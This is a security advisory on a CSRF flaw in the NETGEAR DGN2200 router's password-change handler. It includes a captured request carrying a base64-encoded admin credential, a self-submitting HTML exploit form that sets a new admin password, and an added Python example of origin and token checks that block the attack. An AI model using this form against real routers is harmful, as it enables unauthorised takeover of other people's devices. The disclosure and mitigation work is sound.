# Exploit Title: CSRF in NETGEAR DGN2200 Admin panel
# Date: 02/05/2014
# Exploit author: Dolev Farhi @f1nhack
# Vendor homepage: http://netgear.com
# Affected Firmware version: 1.0.0.29_1.7.29_HotS
# Affected Hardware: NETGEAR DGN2200 Wireless ADSL Router
Summary
=======
A Cross-Site Request Forgery (CSRF) vulnerability was found in the admin panel of the NETGEAR DGN2200 router. The password-change handler (/password.cgi) accepts a state-changing POST without an anti-CSRF token and without checking where the request came from.
Vulnerability Description
=========================
Cross-Site Request Forgery (CSRF). The admin panel authenticates with HTTP Basic auth (see the Authorization header in the captured request below), so once the administrator has logged in, the browser silently attaches those credentials to any request sent to the router's address, including a form POST issued from a third-party page. An attacker who gets a logged-in administrator to open a page containing the form in the Exploit section can therefore submit /password.cgi on the administrator's behalf and set a new admin password. The attacker needs the router's LAN address (10.0.0.138 in this PoC). The form also carries the current password in sysOldPasswd, exactly as the legitimate PWD_password.htm page does; whether the handler verifies that value is not stated in this advisory.
PoC
====
POST /password.cgi HTTP/1.1
Host: 10.0.0.138
Proxy-Connection: keep-alive
Content-Length: 122
Cache-Control: max-age=0
Authorization: Basic QWRtaW46VG9vbGJveDEj
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://10.0.0.138
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://10.0.0.138/PWD_password.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8

sysOldPasswd=OLDPASS&sysNewPasswd=NEWPASS&sysConfirmPasswd=NEWPASS&authTimeout=5&cfAlert_Apply=Apply
Exploit
=========
<html>
<body onload="document.forms[0].submit()">
<H2>CSRF Exploit to change Admin password</H2>
<!-- Auto-submitted cross-site POST to the router's password handler.
     The victim's browser attaches its cached Basic-auth credentials,
     so the router accepts the request as the logged-in administrator.
     Replace 10.0.0.138 with the target router's LAN address and
     OLDPASS/NEWPASS with the current and desired admin passwords. -->
<form method="POST" name="form0" action="http://10.0.0.138/password.cgi">
<input type="hidden" name="sysOldPasswd" value="OLDPASS"/>
<input type="hidden" name="sysNewPasswd" value="NEWPASS"/>
<input type="hidden" name="sysConfirmPasswd" value="NEWPASS"/>
<input type="hidden" name="authTimeout" value="5"/>
<input type="hidden" name="cfAlert_Apply" value="Apply"/>
</form>
</body>
</html>
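To make concrete what the Vulnerability Description says is missing from /password.cgi, and what would have stopped the form above, here is an added example (not NETGEAR firmware code and not part of the original advisory) of the two server-side checks a password handler should apply to a state-changing POST: a source-origin check on the Origin/Referer headers and a per-session synchronizer token. The sample requests are constructed to match the shape of the PoC capture; the token field name csrf_token, the session token value, and the attacker host attacker.example are assumptions for illustration.

```python
"""CSRF checks that the DGN2200 password handler lacks (added example)."""
import hmac
from urllib.parse import parse_qs, urlsplit

TRUSTED_HOSTS = {"10.0.0.138"}        # the router's own address in the PoC
SESSION_TOKEN = "7f3a9c1e5d2b4a6f"    # assumed per-session token a fixed form would carry
TOKEN_FIELD = "csrf_token"            # assumed name of the hidden token field


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, form fields)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    fields = {k: v[0] for k, v in
              parse_qs(body.decode("latin-1"), keep_blank_values=True).items()}
    return method, path, headers, fields


def csrf_verdict(raw: bytes, trusted_hosts=TRUSTED_HOSTS,
                 session_token=SESSION_TOKEN) -> str:
    """Return 'ok' or a rejection reason for a state-changing request."""
    method, _path, headers, fields = parse_request(raw)
    if method != "POST":
        return "reject: state change must be a POST"
    # Check 1: source origin. Browsers add Origin to cross-site form POSTs and
    # attacker-controlled HTML cannot override it; Referer is the fallback.
    source = headers.get("origin") or headers.get("referer")
    if source is None:
        return "reject: no Origin or Referer header"
    if urlsplit(source).hostname not in trusted_hosts:
        return f"reject: cross-site request from {source}"
    # Check 2: synchronizer token, a per-session secret the attacker's page
    # cannot read, so a forged form cannot include the right value.
    token = fields.get(TOKEN_FIELD, "")
    if not hmac.compare_digest(token, session_token):
        return "reject: missing or wrong CSRF token"
    return "ok"


def build_request(origin: str, referer: str, body: str) -> bytes:
    """Constructed request shaped like the PoC capture (not a live capture)."""
    return (
        "POST /password.cgi HTTP/1.1\r\n"
        "Host: 10.0.0.138\r\n"
        # The browser re-sends cached Basic-auth credentials automatically,
        # which is why the forged request is authenticated.
        "Authorization: Basic QWRtaW46VG9vbGJveDEj\r\n"
        f"Origin: {origin}\r\n"
        f"Referer: {referer}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n" + body
    ).encode("latin-1")


PASSWORD_BODY = ("sysOldPasswd=OLDPASS&sysNewPasswd=NEWPASS&sysConfirmPasswd=NEWPASS"
                 "&authTimeout=5&cfAlert_Apply=Apply")

# What the browser sends when the exploit page is loaded from attacker.example
FORGED = build_request("http://attacker.example",
                       "http://attacker.example/csrf.html", PASSWORD_BODY)
# The PoC request replayed as captured: same-origin, but no token field
POC_REPLAY = build_request("http://10.0.0.138",
                           "http://10.0.0.138/PWD_password.htm", PASSWORD_BODY)
# What a fixed password page would send: same-origin and carrying the token
LEGIT = build_request("http://10.0.0.138", "http://10.0.0.138/PWD_password.htm",
                      PASSWORD_BODY + f"&{TOKEN_FIELD}={SESSION_TOKEN}")

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("poc_replay", POC_REPLAY), ("legit", LEGIT)):
        print(f"{name:11s} -> {csrf_verdict(req)}")
```

The origin check alone blocks the exploit page above, because a browser fills in Origin from the page that hosts the form, not from the form's action. The token is kept as a second, independent check so that a same-origin replay without a fresh token (the POC_REPLAY case) is rejected as well.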